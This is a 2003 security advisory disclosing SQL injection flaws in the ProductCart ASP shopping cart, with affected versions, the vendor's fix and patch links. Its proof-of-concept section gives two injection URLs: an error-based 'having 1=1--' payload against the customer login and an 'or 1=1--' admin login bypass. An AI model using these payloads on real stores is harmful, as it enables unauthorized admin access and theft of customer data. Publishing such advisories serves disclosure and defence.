bosen-adv.7.txt

`$Id: bosen-adv.7,v1 25/06/2003 bosen Exp $  
  
1ndonesian Security Team (1st)  
Bosen Advisory #7 ProductCart SQL Injection  
25/06/2003  
  
  
  
  
ProductCart SQL Injection Vulnerability  
_______________________________________________________________________________  
  
  
1ndonesian Security Team (1st)  
http://bosen.net/releases/  
==============================================================================================  
Security Advisory  
  
  
  
Advisory Name: ProductCart SQL Injection Vulnerability  
Release Date: 06/20/2003  
Application:   
ProductCart v1.5   
ProductCart v1.5002   
ProductCart v1.5003   
ProductCart v1.5003r   
ProductCart v1.5004   
ProductCart v1.6b   
ProductCart v1.6br   
ProductCart v1.6br001   
ProductCart v1.6br003  
ProductCart v1.6b001  
ProductCart v1.6b002   
ProductCart v1.6b003   
ProductCart v1.6002  
ProductCart v1.6003  
ProductCart v2  
ProductCart v2br000   
Platform: Win32/MSSQL  
Severity: High  
BUG Type: SQL Injection  
Author: Bosen <[email protected]>  
Discover by: Bosen <[email protected]>  
Vendor Status: See below.  
Vendor URL: http://www.earlyimpact.com/  
Reference: http://bosen.net/releases/  
  
  
  
Overview:  
From the web  
"ProductCart® is an ASP shopping cart that combines sophisticated ecommerce   
features with time-saving store management tools and remarkable ease of use."  
From the author  
"Even the application is not Open Source, but we can 'debug' the application  
on the fly. And with SQL Injection we can query some information about the tables  
and database, even the data it self. With more work will couse ability to access into   
the admin control panel site."  
  
  
  
Details:  
The error msg of the application handled very good, but not that good. Couse still have  
XSS injection vulnerbility (read my previous advisories). Those error handler would make  
exploitation very difficult to do.  
But, not all script handled by those error handler script.   
For example Custva.asp, its still vulnerable to SQL Injection.  
  
But the worst is, on the admin control panel which is can be injected by old famous   
SQL injection 'or 1=1--'. Which makes you able to get access into admin control panel  
without needing any access.  
  
  
Exploits/POC:  
file Custva.asp  
http://<target>/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email  
&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit  
  
file login.asp  
http://<target>/produccart/pdacmin/login.asp?idadmin='' or 1=1--  
  
  
  
Vendor Response:  
Contacted.   
quick fix released.  
http://www.earlyimpact.com/productcart/support/security-alert-070403.asp  
  
  
Recommendation:  
a quick patch posted on  
http://www.zone-h.org/en/advisories/read/id=2611/  
http://www.earlyimpact.com/productcart/support/security-alert-070403.asp  
  
  
  
1ndonesian Security Team (1st) Advisory:  
http://bosen.net/releases/  
  
  
  
About 1ndonesian Security Team:  
1ndonesian Security Team, research and develop intelligent, advanced application  
security assessment. Based in Indonesia, 1ndonesian Security Team offers best of  
breed security consulting services, specialising in application, host and network  
security assessments.  
  
1st provides security information and patches for use by the entire 1st community.  
  
This information is provided freely to all interested parties and may be   
redistributed provided that it is not altered in any way, 1st is appropriately   
credited and the document retains.  
  
  
Greetz to:  
AresU, TioEuy, sakitjiwa, muthafuka, alphacentury   
All 1ndonesian Security Team - #[email protected]/centrin.net.id  
  
  
  
  
  
  
  
Bosen <[email protected]>  
======================  
Original document can be fount at http://bosen.net/releases/?id=40  
`